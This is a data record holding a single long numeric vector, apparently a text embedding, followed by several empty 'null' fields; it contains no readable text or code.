-0.007281889673322439, -0.007200154010206461, 0.014638083986938, 0.005792074371129274, -0.02416398376226425, -0.008656531572341919, -0.008946321904659271, -0.0033140028826892376, 0.0019505061209201813, 0.019170688465237617, 0.009652218781411648, -0.000977110699750483, 0.00804723147302866, 0.006059572566300631, -0.007913482375442982, 0.013025665655732155, 0.01640654355287552, -0.006628005765378475, -0.027968401089310646, -0.004974719602614641, -0.002957338932901621, 0.009607636369764805, 0.011472691781818867, -0.013984200544655323, -0.00834445096552372, 0.006683734245598316, -0.0011294359574094415, -0.012282615527510643, -0.004547465592622757, 0.005008156877011061, 0.005754922050982714, 0.010581031441688538, -0.017476534470915794, 0.0074862283654510975, -0.012683862820267677, 0.0027957253623753786, -0.015291968360543251, 0.0035090534947812557, 0.012438655830919743, 0.01640654355287552, -0.0121860196813941, -0.008366742171347141, -0.010811377316713333, -0.015648631379008293, 0.0014907439472153783, -0.012044839560985565, -0.003912157844752073, 0.01013520173728466, -0.022663023322820663, -0.007567964028567076, 0.0043282657861709595, -0.010023743845522404, 0.005654610227793455, -0.00019655993673950434, 0.016287654638290405, 0.0013514221645891666, -0.015663493424654007, 0.027730625122785568, -0.0008651887765154243, 0.0021474144887179136, 0.02022581920027733, -0.004205662757158279, 0.006932656280696392, -0.003098518354818225, -0.016183627769351006, 0.0057660676538944244, 0.0068323444575071335, -0.006624290253967047, -0.006256480701267719, -0.000355735159246251, -0.01532169058918953, 0.009265832602977753, -0.00931041594594717, 0.008493061177432537, -0.0027882950380444527, 0.0032898536883294582, 0.011792202480137348, -0.025828417390584946, -0.0010179784148931503, -0.011472691781818867, -0.03064338117837906, 0.011903660371899605, -0.01998804323375225, -0.013367468491196632, 0.0034013111144304276, -0.0011396529152989388, 0.033258914947509766, -0.01640654355287552, 0.0036502329166978598, 0.0024594953283667564, -0.016986122354865074, -0.013545800931751728, -0.01252039149403572, -0.018383055925369263, -0.004792672116309404, -0.005424264818429947, 0.016956400126218796, -0.007040398195385933, -0.005896101240068674, -0.025308281183242798, 0.003975317347794771, 0.027448264881968498, -0.010729641653597355, -0.012208310887217522, -0.01570807583630085, 0.015277107246220112, 0.014608361758291721, -0.004417432006448507, -0.006873212289065123, 0.0003866181941702962, -0.021756501868367195, 0.0063382163643836975, -0.008470769971609116, -0.00719643896445632, -0.017654867842793465, 0.013649827800691128, 0.0012297476641833782, 0.002126980572938919, 0.012914208695292473, -0.005918392911553383, 0.005201349500566721, 0.007527096197009087, -0.032902251929044724, 0.01820472441613674, 0.0010393410921096802, -0.0023276039864867926, -0.0006329856696538627, 0.019408464431762695, 0.009897425770759583, -0.0016217065276578069, 0.03489362448453903, -0.012512961402535439, -0.027790067717432976, 0.010016313754022121, 0.006412521004676819, -0.005558013916015625, 0.007029252592474222, -0.010410130023956299, 0.00422423891723156, -0.007854037918150425, -0.0022625871933996677, 0.0264079961925745, 0.004878122825175524, -0.0018334757769480348, 0.0040199002251029015, 0.011012000031769276, 0.010350685566663742, -0.009369860403239727, 0.013999061658978462, -0.0018892044899985194, -0.016986122354865074, -0.0020675365813076496, 0.0016746488399803638, 0.0009041989105753601, -0.009005765430629253, 0.012453516945242882, 0.00413878820836544, -0.018353333696722984, -0.004907845053821802, 0.015470299869775772, 0.009719093330204487, -0.012334628961980343, 0.011599009856581688, 0.009035487659275532, 0.02138497866690159, -0.021607892587780952, -0.004291113466024399, -0.013560662046074867, 0.0033567282371222973, -0.02086484245955944, -0.012215740978717804, -0.0022217193618416786, -0.014749541878700256, -0.009332707151770592, -0.017164453864097595, -0.003815561532974243, -0.00027121324092149734, 0.008232993073761463, -0.02079053781926632, -0.010699919424951077, -0.03938164934515953, 0.001574337133206427, 0.0008178193820640445, -0.004878122825175524, 0.017818337306380272, 0.016183627769351006, -0.01991373859345913, 0.018992356956005096, 0.00305950827896595, -0.003860144643113017, -0.042026907205581665, -0.008886877447366714, 0.005650894716382027, -0.00312080979347229, 0.009302985854446888, 0.016599735245108604, -0.0041796560399234295, 0.01573779806494713, 0.020924286916851997, -0.009392151609063148, 0.007772302720695734, 0.004473160952329636, 0.011049153283238411, 0.014950165525078773, 0.007720289286226034, 0.008567365817725658, -0.013278302736580372, 0.006494256667792797, -0.009265832602977753, 0.0018158283783122897, 0.012654140591621399, 0.013575523160398006, -0.006917795166373253, 0.026556605473160744, 0.01332288607954979, -0.005457702092826366, 0.014169963076710701, 0.020612206310033798, -0.015128497034311295, 0.011933382600545883, 0.013902464881539345, -0.026452578604221344, -0.016347099095582962, -0.010358116589486599, 0.00399017846211791, -0.0001317752612521872, 0.021756501868367195, 0.021652474999427795, -0.013642396777868271, -0.000021870630007470027, -0.0019393604015931487, 0.008493061177432537, -0.012349490076303482, 0.0019430756801739335, -0.011532135307788849, 0.026110775768756866, -0.010729641653597355, 0.01116804126650095, 0.0035350602120161057, -0.011160610243678093, 0.005483708810061216, -0.015180510468780994, 0.024743564426898956, -0.022663023322820663, 0.02504078298807144, -0.01253525260835886, 0.018279029056429863, -0.007519665639847517, -0.002595101948827505, 0.02587299980223179, 0.0009144158684648573, -0.0026824104133993387, -0.004558611661195755, -0.0016114895697683096, -0.021652474999427795, 0.005624887999147177, -0.005130759906023741, 0.029187003150582314, 0.03670666739344597, 0.001339347567409277, 0.0004223774594720453, -0.005316522438079119, -0.014652945101261139, -0.02339121326804161, 0.0012083849869668484, -0.00942930392920971, -0.00043723845737986267, 0.03771721571683884, 0.0010904257651418447, 0.00718900840729475, -0.01619848981499672, 0.011019431054592133, -0.022098306566476822, -0.0029591964557766914, 0.00920638907700777, -0.003566639730706811, -0.010127770714461803, -0.007950634695589542, 0.0006733890040777624, 0.041462186723947525, -0.007062689866870642, -0.0015901268925517797, 0.005008156877011061, 0.008478200063109398, -0.0019022078486159444, 0.006605714093893766, -0.006824913900345564, -0.02819131501019001, 0.001299408613704145, -0.011019431054592133, -0.014088227413594723, -0.030078662559390068, 0.003479331498965621, -0.004402570892125368, -0.014838707633316517, 0.01851680502295494, -0.026274247094988823, 0.005621172953397036, 0.016421403735876083, 0.012371782213449478, 0.004885553382337093, -0.0012538968585431576, 0.007482512854039669, 0.008403895422816277, -0.010997138917446136, -0.016332238912582397, 0.01820472441613674, -0.036974165588617325, -0.010737071745097637, -0.0045809028670191765, -0.0025300851557403803, -0.01728334277868271, -0.004465730395168066, 0.030108384788036346, -0.006865781731903553, 0.0021771364845335484, -0.0033492976799607277, -0.01795208640396595, -0.018293889239430428, -0.0076459841802716255, -0.009139514528214931, 0.009198958054184914, -0.02398565225303173, 0.017417091876268387, -0.00413878820836544, 0.008604518137872219, -0.0123420599848032, -0.029231585562229156, -0.007631123065948486, -0.006962378043681383, -0.007218730170279741, 0.0004843756905756891, -0.01530682947486639, -0.01044728234410286, 0.025858137756586075, -0.009577914141118526, 0.00005053320273873396, 0.01539599522948265, 0.006754324305802584, 0.017313063144683838, 0.001772174146026373, 0.018977496773004532, -0.006575992330908775, 0.007159286178648472, -0.007255882956087589, -0.003457039827480912, 0.007244736887514591, 0.001356994966045022, -0.004105350933969021, 0.024253150448203087, 0.011026861146092415, -0.002335034543648362, -0.013010804541409016, -0.020181236788630486, 0.004644062370061874, 0.010737071745097637, 0.0067023104056715965, 0.015121066942811012, -0.012758167460560799, -0.0011814493918791413, -0.0030743691604584455, -0.013634966686367989, -0.0014220118755474687, -0.02594730444252491, 0.0025133665185421705, -0.003562924452126026, -0.009146944619715214, 0.00829243753105402, 0.01991373859345913, -0.021652474999427795, 0.006148738320916891, 0.007315326947718859, -0.015187941491603851, -0.020285263657569885, 0.023539822548627853, 0.01344920415431261, 0.0102020762860775, -0.008879447355866432, 0.00026215732214041054, 0.00624905014410615, -0.008842294104397297, -0.01053644809871912, 0.01924499310553074, -0.00809924490749836, 0.005231071729212999, -0.006769184954464436, 0.005576590076088905, 0.0007546601118519902, 0.04208634793758392, 0.02731451578438282, -0.0028625999111682177, 0.006397660356014967, 0.007876329123973846, 0.0076088313944637775, 0.009637357667088509, -0.002359183505177498, 0.000004625921519618714, 0.0026415425818413496, 0.023851903155446053, -0.005520861130207777, 0.030583936721086502, -0.008010078221559525, -0.004034761339426041, -0.018100697547197342, 0.002896037185564637, 0.018918052315711975, 0.002767861122265458, -0.015002178959548473, 0.012460947968065739, 0.010699919424951077, 0.006984669715166092, -0.013382329605519772, -0.027864374220371246, -0.009837981313467026, 0.00920638907700777, 0.022960243746638298, 0.009704232215881348, -0.00008057447848841548, 0.003072511637583375, 0.01787778176367283, -0.02037443034350872, 0.026809241622686386, -0.01802639104425907, -0.0016848657978698611, -0.02089456468820572, -0.013731563463807106, -0.004699790850281715, 0.021191785112023354, 0.025679806247353554, -0.03314002975821495, 0.02932075224816799, 0.005312807392328978, -0.008619379252195358, -0.011442969553172588, 0.0024056241381913424, -0.0007760227890685201, 0.002957338932901621, 0.006334500852972269, -0.008314728736877441, -0.01764000579714775, -0.02597702667117119, -0.004410001449286938, 0.0062230434268713, -0.0003146352246403694, -0.002541230758652091, 0.011056583374738693, 0.010647905990481377, -0.03328863903880119, -0.010068327188491821, -0.026214802637696266, -0.0022960244677960873, -0.0027028443291783333, 0.002100973855704069, 0.023747876286506653, -0.011012000031769276, -0.015722937881946564, -0.008961182087659836, -0.0014526626328006387, 0.0006450602668337524, -0.00838160328567028, -0.02352496236562729, -0.02279677242040634, -0.012052270583808422, 0.0006404161686077714, -0.017729172483086586, -0.002797583118081093, -0.010959986597299576, 0.015797242522239685, 0.012891916558146477, -0.004644062370061874, -0.00260810530744493, -0.014994747936725616, -0.004874407779425383, -0.001776818186044693, -0.0064868261106312275, -0.009756245650351048, -0.0032452705781906843, -0.01136123389005661, -0.0052087800577282906, -0.008827433921396732, -0.029707137495279312, 0.00028839625883847475, 0.00029930981690995395, 0.016852373257279396, -0.0004908773698844016, 0.007523380685597658, -0.028414230793714523, 0.013835590332746506, -0.011123457923531532, 0.017862921580672264, 0.00213812617585063, -0.007382201496511698, -0.0011870223097503185, 0.008010078221559525, -0.0148461377248168, -0.008931460790336132, -0.022499551996588707, -0.01928957737982273, 0.010915404185652733, -0.009867703542113304, -0.009577914141118526, -0.0049004144966602325, 0.02888978272676468, 0.005045309197157621, 0.0033177181612700224, 0.020463595166802406, 0.03623111546039581, -0.0032192638609558344, -0.0011712325504049659, 0.0037635480985045433, 0.006382799241691828, -0.024238290265202522, 0.0008517210371792316, -0.008990904316306114, -0.00129104929510504, 0.007631123065948486, 0.002108404180034995, 0.0041536493226885796, -0.03272391855716705, -0.012297476641833782, -0.011279498226940632, -0.013746424578130245, -0.021191785112023354, 0.0013114832108840346, 0.0062453350983560085, 0.021786224097013474, -0.010848529636859894, 0.005758637096732855, -0.005799504928290844, 0.012847334146499634, 0.017119871452450752, -0.003982747904956341, 0.024565231055021286, 0.0074193538166582584, 0.018962634727358818, 0.0025096512399613857, -0.013612675480544567, -0.01735764741897583, 0.005483708810061216, -0.011160610243678093, 0.0061524538323283195, -0.014905582182109356, -0.008767989464104176, -0.009994021616876125, 0.007556817959994078, -0.003678097389638424, 0.023123715072870255, -0.016614597290754318, -0.024803007021546364, -0.010514156892895699, -0.011546996422111988, 0.01988401636481285, 0.01160643994808197, -0.008812572807073593, -0.0016161336097866297, -0.004428577609360218, -0.0026824104133993387, 0.00260810530744493, 0.004866977222263813, 0.024134263396263123, -0.0019690822809934616, -0.013033096678555012, -0.01622821018099785, -0.01841277815401554, 0.033229194581508636, 0.01145039964467287, 0.006683734245598316, -0.008128966204822063, 0.007463936693966389, -0.007958064787089825, 0.00200809258967638, -0.010164923034608364, -0.029261307790875435, 0.014935304410755634, -0.016837511211633682, -0.008515352383255959, -0.0016068455297499895, 0.01952735334634781, -0.002037814585492015, -0.002979630371555686, 0.003360443515703082, 0.014251697808504105, 0.006182175595313311, 0.018145279958844185, 0.021801086142659187, -0.0020043773110955954, -0.001995089231058955, 0.011212623678147793, -0.012282615527510643, -0.00804723147302866, -0.024535508826375008, 0.008961182087659836, 0.02114720270037651, 0.005435410421341658, -0.020775677636265755, -0.0023703293409198523, 0.015841824933886528, 0.01851680502295494, 0.02009207010269165, -0.002948050620034337, -0.002312743104994297, -0.010959986597299576, 0.016035018488764763, -0.005450271535664797, -0.012787889689207077, 0.006787761580199003, -0.004168510437011719, 0.009785967878997326, -0.008857155218720436, -0.005884955637156963, -0.01550002209842205, -0.0036966735497117043, -0.02416398376226425, 0.006787761580199003, -0.018368195742368698, -0.009563053026795387, -0.015291968360543251, 0.00714442552998662, -0.01274330634623766, -0.005498569458723068, -0.014719819650053978, 0.013226289302110672, -0.0017025131965056062, 0.01155442651361227, -0.02657146565616131, -0.0066465819254517555, -0.00818841066211462, -0.008656531572341919, 0.019022079184651375, 0.0034421789459884167, -0.006772900465875864, 0.0026173933874815702, -0.006130162160843611, -0.011576718650758266, 0.001475882949307561, -0.015158219262957573, -0.01795208640396595, 0.018977496773004532, -0.013791006989777088, -0.0012028120690956712, -0.007244736887514591, -0.0064199515618383884, -0.03412085399031639, -0.007497373968362808, -0.008411325514316559, -0.040659692138433456, 0.0028235898353159428, 0.01058846153318882, -0.004729513078927994, -0.003971601836383343, 0.00915437564253807, -0.022811634466052055, 0.006724602077156305, 0.02153358794748783, -0.00047206893214024603, 0.012052270583808422, -0.006282487418502569, -0.002325746463611722, 0.009176666848361492, 0.004644062370061874, -0.01467523630708456, -0.010350685566663742, 0.012260324321687222, -0.011480121873319149, -0.000015035151591291651, -0.013189136981964111, -0.004952427931129932, -0.005799504928290844, 0.03530973568558693, 0.013895033858716488, 0.017803477123379707, 0.01049929577857256, -0.0003276385832577944, -0.011814494617283344, 0.006334500852972269, 0.004331981297582388, -0.014898152090609074, 0.014682667329907417, -0.008983474224805832, 0.016674041748046875, -0.012914208695292473, -0.009733954444527626, -0.0070181069895625114, 0.00422423891723156, 0.018843747675418854, -0.00915437564253807, 0.0011573003139346838, -0.004517743829637766, 0.017090149223804474, 0.015165649354457855, -0.019839433953166008, 0.007504804525524378, -0.013887603767216206, 0.01875458098948002, 0.014972456730902195, 0.005951830185949802, -0.008173549547791481, 0.01263927947729826, -0.015031900256872177, 0.007125848904252052, 0.0050193024799227715, -0.006412521004676819, -0.001586411613970995, 0.0121340062469244, 0.0016412115655839443, -0.007616261951625347, 0.01467523630708456, -0.009228680282831192, 0.012542683631181717, 0.007348764222115278, 0.0076459841802716255, 0.01567835360765457, 0.0039047275204211473, 0.03415057435631752, -0.012104284018278122, -0.006107870489358902, -0.004298544023185968, 0.004201947711408138, -0.020389290526509285, 0.017298202961683273, -0.0015269676223397255, -0.017803477123379707, 0.0001367676304653287, 0.020716233178973198, 0.036558058112859726, -0.0005145620671100914, -0.0227521900087595, 0.00916923675686121, 0.017714310437440872, 0.021548448130488396, -0.006754324305802584, 0.011264637112617493, -0.0021195500157773495, 0.014088227413594723, -0.0031263825949281454, 0.0020266687497496605, -0.005725199822336435, -0.004603194538503885, -0.014578640460968018, 0.013582953251898289, 0.021503865718841553, 0.0027622883208096027, -0.011034292168915272, 0.01581210270524025, 0.022321220487356186, -0.00005944399526924826, 0.018695136532187462, -0.0011833070311695337, -0.030881157144904137, 0.0012882628943771124, 0.028042705729603767, 0.0027028443291783333, 0.0006645653047598898, -0.02096886932849884, 0.010618183761835098, -0.008753128349781036, 0.00855250470340252, -0.010023743845522404, -0.0036595209967345, -0.014719819650053978, 0.006453388836234808, -0.006709740962833166, 0.014021352864801884, -0.006505402270704508, 0.009087501093745232, -0.004952427931129932, 0.02422342821955681, 0.008210701867938042, 0.011056583374738693, 0.005918392911553383, -0.0006390229682438076, 0.014600931666791439, 0.0013727848418056965, -0.03712277486920357, -0.008857155218720436, 0.009563053026795387, 0.006654012482613325, -0.0019375027623027563, -0.017506256699562073, -0.015722937881946564, 0.000864259956870228, -0.005821796599775553, -0.00962249655276537, -0.00410163588821888, 0.021786224097013474, 0.01034325547516346, 0.024535508826375008, -0.000751409272197634, 0.0017554555088281631, -0.013813299126923084, 0.014786694198846817, -0.0052719395607709885, -0.0043654185719788074, -0.006713456474244595, 0.0010226224549114704, 0.010469573549926281, 0.0144820436835289, 0.011279498226940632, -0.005123329348862171, 0.0011220054002478719, 0.0026192511431872845, -0.01023922860622406, -0.008983474224805832, 0.012490670196712017, 0.0019597942009568214, -0.00838160328567028, 0.010685058310627937, 0.005691762547940016, -0.008337020874023438, -0.01655515283346176, -0.010157492943108082, 0.0011015716008841991, -0.002227292163297534, -0.0035127687733620405, -0.027284793555736542, 0.009733954444527626, 0.008961182087659836, 0.01612418331205845, -0.023510100319981575, 0.003889866638928652, 0.027715763077139854, -0.03777666017413139, -0.031891703605651855, -0.0101500628516078, 0.003226694418117404, -0.009139514528214931, 0.0022495838347822428, 0.02016637660562992, 0.008730837143957615, 0.005680616945028305, 0.010774224065244198, -0.00368552771396935, -0.0004439723561517894, -0.0031579623464494944, 0.012810180895030499, -0.0006199823110364377, -0.009080070070922375, -0.002028526272624731, 0.0007435143925249577, -0.017134731635451317, 0.00010356259008403867, 0.002687983214855194, 0.004688645247370005, 0.013330316171050072, 0.020047487691044807, -0.015381134115159512, -0.02556091919541359, -0.012349490076303482, -0.03299141675233841, 0.004629201255738735, 0.00407562917098403, 0.007750011049211025, -0.010283811017870903, -0.0001697404804872349, -0.015544605441391468, 0.010774224065244198, 0.005193919409066439, 0.011197762563824654, -0.004803818184882402, 0.020077209919691086, -0.004253961145877838, 0.0060670031234622, 0.013441774062812328, -0.01049929577857256, 0.03453696146607399, 0.029707137495279312, -0.013813299126923084, -0.003018640447407961, -0.037538882344961166, 0.004484306555241346, 0.017937226220965385, 0.008678823709487915, -0.011227484792470932, -0.005721484776586294, -0.04054080694913864, 0.00509360758587718, 0.011599009856581688, -0.028533117845654488, 0.0011127173202112317, -0.004510313272476196, 0.0018009673804044724, -0.01934901997447014, 0.018383055925369263, 0.0019059231271967292, 0.0102020762860775, 0.0035239143762737513, -0.021191785112023354, 0.014214545488357544, -0.00026122850249521434, 0.011316650547087193, -0.00809924490749836, -0.024357177317142487, 0.014541487209498882, 0.014244267717003822, -0.0037412564270198345, 0.009689371101558208, -0.008091813884675503, -0.03626083955168724, 0.00950360856950283, -0.005847803317010403, 0.025620361790060997, -0.009719093330204487, 0.0030260710045695305, 0.021503865718841553, -0.004718367010354996, 0.009867703542113304, -0.006390229798853397, 0.004770380910485983, -0.013159414753317833, 0.002797583118081093, -0.0062081823125481606, -0.0009520327439531684, 0.015165649354457855, -0.019304437562823296, 0.001476811827160418, -0.015336550772190094, -0.007898621261119843, 0.004291113466024399, 0.0003299606323707849, 0.017164453864097595, -0.016451125964522362, -0.014199684374034405, -0.010803946293890476, 0.008990904316306114, 0.0041127814911305904, -0.014422599226236343, -0.004629201255738735, -0.004309689626097679, -0.0031821115408092737, 0.0145340571179986, -0.005688047502189875, 0.0009603920625522733, -0.009882564656436443, 0.02465439774096012, -0.016926677897572517, 0.004424862563610077, -0.030108384788036346, 0.025204254314303398, -0.004149933811277151, -0.019467908889055252, -0.003475616220384836, 0.01627279445528984, -0.0038341376930475235, -0.007471367251127958, -0.017595423385500908, -0.029409917071461678, 0.011873938143253326, -0.020954009145498276, 0.0016681471606716514, -0.007839176803827286, 0.010625614784657955, 0.008247854188084602, 0.011442969553172588, 0.022291498258709908, 0.008322159759700298, -0.009288124740123749, 0.0145340571179986, 0.02331690676510334, 0.01365725789219141, 0.006334500852972269, 0.0144820436835289, 0.0030743691604584455, -0.0037301108241081238, 0.01341205183416605, 0.023168297484517097, 0.006122731603682041, 0.02142956107854843, 0.0000032145617296919227, 0.013077679090201855, 0.023584404960274696, -0.008842294104397297, 0.010603322647511959, 0.004135073162615299, 0.009421873837709427, 0.0005085248267278075, 0.0018789875321090221, 0.016317376866936684, 0.012810180895030499, 0.022767050191760063, 0.009020626544952393, -0.003124525072053075, 0.0008461481193080544, 0.0018938485300168395, 0.0022644447162747383, 0.0007374770939350128, 0.00739706214517355, 0.00129104929510504, -0.007252167444676161, 0.005569159518927336, 0.009934578090906143, -0.01949763111770153, 0.016035018488764763, -0.00358150084502995, 0.0012576120207086205, 0.01227518543601036, -0.022663023322820663, 0.018383055925369263, 0.01146526075899601, 0.0039047275204211473, -0.013634966686367989, -0.008678823709487915, -0.00011598545097513124, 0.018070975318551064, 0.00626019574701786, -0.02685382589697838, -0.017372507601976395, -0.01928957737982273, 0.0025040784385055304, 0.00003517877121339552, -0.0036409448366612196, -0.0000489658305014018, -0.0124981002882123, -0.0027084171306341887, -0.006772900465875864, -0.0008754057344049215, -0.013843020424246788, 0.03257530927658081, -0.00024474208476021886, 0.0030873725190758705, 0.02507050521671772, 0.01738736964762211, -0.015054192394018173, 0.009013195522129536, 0.007348764222115278, 0.028027843683958054, -0.005747491493821144, -0.008820002898573875, 0.000808995624538511, -0.006876927334815264, 0.0016588590806350112, -0.037746936082839966, 0.015470299869775772, -0.01823444664478302, -0.0026805526576936245, 0.010060896165668964, 0.016703763976693153, -0.008455908857285976, 0.012490670196712017, -0.023970792070031166, 0.0075531029142439365, 0.012721015140414238, 0.019259855151176453, 0.018888330087065697, 0.004941282328218222, -0.0027344238478690386, 0.005855233874171972, 0.006631720811128616, 0.006616859696805477, 0.005725199822336435, 0.01820472441613674, -0.007735149934887886, 0.004291113466024399, -0.015121066942811012, -0.006122731603682041, -0.014652945101261139, 0.017580561339855194, 0.018427638337016106, -0.00311152171343565, -0.022960243746638298, 0.014088227413594723, 0.019928600639104843, 0.00613759271800518, -0.010722210630774498, -0.020151514559984207, 0.0182641688734293, -0.020924286916851997, -0.007683136500418186, -0.010008882731199265, 0.0017796047031879425, -0.009540761820971966, 0.009719093330204487, -0.023970792070031166, 0.008180979639291763, 0.00510103814303875, 0.011071444489061832, 0.010514156892895699, 0.031118933111429214, 0.017015844583511353, 0.0009780394611880183, -0.015351411886513233, 0.009719093330204487, 0.025575779378414154, -0.0012520392192527652, -0.009347568266093731, -0.015247385017573833, 0.005584020633250475, 0.005691762547940016, 0.006966093555092812, 0.018605971708893776, 0.020671648904681206, 0.0061784605495631695, -0.012914208695292473, -0.021162062883377075, 0.014043644070625305, 0.0028050136752426624, 0.020924286916851997, 0.026036471128463745, -0.005483708810061216, -0.009592775255441666, -0.004458299838006496, -0.0049264212138950825, -0.004896699450910091, 0.0027957253623753786, 0.010216936469078064, -0.011717897839844227, 0.021890250965952873, 0.021786224097013474, -0.0021808515302836895, 0.014764402993023396, 0.010491865687072277, -0.007203869521617889, 0.0025672377087175846, 0.019854294136166573, 0.01630251668393612, 0.014526627026498318, 0.010439852252602577, -0.010811377316713333, -0.02089456468820572, 0.019542213529348373, 0.007255882956087589, 0.008507922291755676, 0.012654140591621399, -0.0036075075622648, -0.018397916108369827, 0.01570807583630085, 0.0008154973038472235, 0.024936756119132042, 0.006527693942189217, 0.00843361672013998, -0.009087501093745232, 0.0001298015413340181, 0.0145340571179986, 0.026838963851332664, -0.0004509384452831, -0.00131241197232157, -0.0018548384541645646, 0.012914208695292473, -0.0124981002882123, -0.012654140591621399, 0.020909426733851433, 0.0038081309758126736, -0.015135928057134151, -0.002585813868790865, -0.004632916301488876, 0.0016152048483490944, 0.00951846968382597, -0.004852116107940674, -0.0044880216009914875, 0.021013453602790833, 0.01764000579714775, -0.01844250038266182, 0.0028143017552793026, -0.000954819202888757, -0.007567964028567076, -0.0028978949412703514, -0.0004300401487853378, 0.006297348532825708, 0.002550519071519375, -0.011777341365814209, 0.01841277815401554, -0.013724132440984249, 0.007891190238296986, -0.01668890193104744, -0.003354870481416583, 0.003783982014283538, 0.004558611661195755, -0.0035369177348911762, -0.02202400006353855, -0.02012179233133793, 0.019854294136166573, -0.0143260033801198, 0.007430499419569969, -0.02538258582353592, -0.0019486484816297889, -0.01851680502295494, 0.008441047742962837, 0.012832473032176495, 0.004933851771056652, -0.0029499083757400513, 0.0015966285718604922, -0.020805398002266884, 0.00203409930691123, 0.015871547162532806, 0.015841824933886528, 0.0075419568456709385, 0.004759234841912985, -0.004722082521766424, 0.00253751571290195, -0.023510100319981575, 0.00514562102034688, 0.012906777672469616, 0.005212495569139719, 0.005071315914392471, 0.00834445096552372, -0.0013542085653170943, 0.009771106764674187, 0.011494982987642288, 0.014860998839139938, 0.010625614784657955, -0.018739720806479454, -0.006159883923828602, 0.0066725886426866055, 0.004881838336586952, -0.012408934533596039, -0.005717769265174866, -0.013330316171050072, -0.006040995940566063, 0.00040612323209643364, -0.014779264107346535, -0.0005582162993960083, -0.012111714109778404, 0.024178845807909966, 0.0005791145376861095, 0.0072075845673680305, 0.021518725901842117, 0.013181705959141254, 0.012973652221262455, -0.009748815558850765, -0.01622821018099785, 0.01044728234410286, -0.014251697808504105, -0.0030037795659154654, -0.005602596793323755, -0.014630653895437717, -0.041224412620067596, -0.006107870489358902, 0.00519763445481658, -0.007538241799920797, -0.004413716960698366, 0.006928940769284964, 0.00011557909601833671, -0.018918052315711975, 0.005201349500566721, 0.00611158600077033, 0.009830551221966743, 0.012230602093040943, -0.004372849129140377, 0.0035777855664491653, 0.00209540082141757, 0.013857881538569927, 0.018487082794308662, -0.0064608193933963776, 0.011435538530349731, -0.008314728736877441, 0.012007687240839005, 0.014207115396857262, -0.012356921099126339, -0.012936499901115894, 0.009035487659275532, -0.03418029844760895, -0.019096383824944496, 0.013627536594867706, 0.01714959368109703, 0.02194969542324543, 0.013285732828080654, -0.012178588658571243, -0.0005493925418704748, -0.013686980120837688, 0.023970792070031166, 0.003912157844752073, 0.0016987979179248214, -0.012780459597706795, 0.014898152090609074, -0.011086305603384972, -0.0027084171306341887, -0.004064483102411032, 0.05644207447767258, -0.003841568250209093, 0.028518257662653923, -0.001882702810689807, 0.0012585408985614777, -0.000665494124405086, -0.005424264818429947, -0.007452791091054678, 0.004383994732052088, 0.0032155485823750496, -0.005847803317010403, 0.001074636005796492, 0.01728334277868271, -0.008455908857285976, -0.0030074946116656065, -0.0006041924934834242, 0.004157364368438721, -0.006977239158004522, 0.0004449011757969856, -0.016882095485925674, -0.022663023322820663, 0.009050348773598671, 0.03242669999599457, -0.015485160984098911, -0.003783982014283538, -0.006405090447515249, 0.01651057042181492, -0.011925951577723026, 0.012304907664656639, -0.0072075845673680305, 0.030316438525915146, -0.008582226932048798, -0.011494982987642288, -0.004543750546872616, 0.008225562982261181, 0.021830808371305466, -0.0015659778146073222, 0.01704556681215763, 0.0014814558671787381, -0.0016477132448926568, -0.004666353575885296, 0.007411923259496689, -0.02507050521671772, 0.0038378529716283083, 0.004012469667941332, 0.004253961145877838, -0.011056583374738693, 0.004521458875387907, 0.013129692524671555, 0.014823846518993378, 0.0050490242429077625, 0.004398855846375227, -0.008805141784250736, 0.016451125964522362, -0.009444165043532848, 0.016986122354865074, 0.011963103897869587, -0.016718624159693718, -0.01619848981499672, -0.016421403735876083, -0.011836785823106766, -0.00906520988792181, -0.008106674998998642, -0.015091344714164734, -0.02096886932849884, 0.002912755822762847, 0.014630653895437717, 0.0247881468385458, -0.010090618394315243, 0.03349669277667999, 0.0038750055246055126, 0.005483708810061216, -0.019542213529348373, -0.0010411987314000726, -0.0016365675255656242, -0.010818807408213615, 0.01738736964762211, 0.0069252257235348225, 0.011264637112617493, 0.00955562200397253, -0.0014786694664508104, -0.007742580492049456, 0.018561387434601784, -0.005702908616513014, -0.007129564415663481, -0.0072075845673680305, -0.011420677416026592, 0.0010495580499991775, -0.020240681245923042, 0.009808259084820747, 0.020344708114862442, -0.000753731292206794, -0.013887603767216206, -0.010714780539274216, 0.018115557730197906, -0.0020935432985424995, 0.0003109199751634151, -0.010164923034608364, 0.000009629172382119577, 0.00511961430311203, 0.01756570115685463, 0.013315455056726933, -0.01865055412054062, 0.010729641653597355, 0.024030236527323723, 0.008886877447366714, 0.011480121873319149, -0.013999061658978462, 0.0006836059619672596, 0.005680616945028305, 0.021711919456720352, -0.011695606634020805, -0.014957595616579056, 0.013932187110185623, 0.023331768810749054, 0.0067951916716992855, -0.005613742396235466, 0.0020099501125514507, 0.018011530861258507, 0.0041127814911305904, -0.016436265781521797, -0.014734680764377117, 0.03768749535083771, 0.01893291249871254, 0.012015118263661861, -0.008931460790336132, -0.00729303527623415, 0.017521118745207787, 0.0036409448366612196, 0.0012761882971972227, -0.012787889689207077, -0.012490670196712017, 0.01679292879998684, 0.009726524353027344, -0.019586797803640366, 0.011992826126515865, -0.010365546680986881, 0.02545689232647419, 0.021266089752316475, -0.0033251484856009483, -0.004971004091203213, 0.039678867906332016, -0.008582226932048798, 0.006784046068787575, -0.01570807583630085, 0.025813555344939232, -0.011368663981556892, 0.018472222611308098, -0.02272246778011322, -0.005602596793323755, 0.0039641717448830605, 0.026140497997403145, 0.01467523630708456, 0.005572874564677477, -0.0027734339237213135, -0.006052142009139061, 0.00037988429539836943, 0.01563377119600773, 0.003399453591555357, -0.012141436338424683, 0.004536319989711046, 0.0018492655362933874, 0.005587735679000616, 0.011041722260415554, 0.005543152801692486, 0.001852052053436637, 0.0010449140099808574, -0.0035480635706335306, 0.015262246131896973, 0.0007750939694233239, -0.03263475373387337, 0.0015269676223397255, 0.00014535915397573262, -0.008411325514316559, 0.014875859953463078, 0.013248580507934093, 0.014504334889352322, -0.001983943395316601, 0.008054661564528942, 0.005528291687369347, 0.014704958535730839, -0.003871290246024728, -0.015210232697427273, 0.01764000579714775, 0.046158261597156525, 0.0004583689442370087, -0.008262715302407742, -0.0039641717448830605, 0.01820472441613674, -0.00813639722764492, -0.0008661175961606205, -0.022321220487356186, 0.0012492527021095157, -0.003975317347794771, -0.007950634695589542, 0.010633044876158237, 0.007538241799920797, 0.005052739754319191, 0.01596071384847164, -0.004387709777802229, 0.006743178237229586, -0.028027843683958054, -0.008530213497579098, 0.01339719071984291 ]
null
null
null
null
null
null
null
null
null
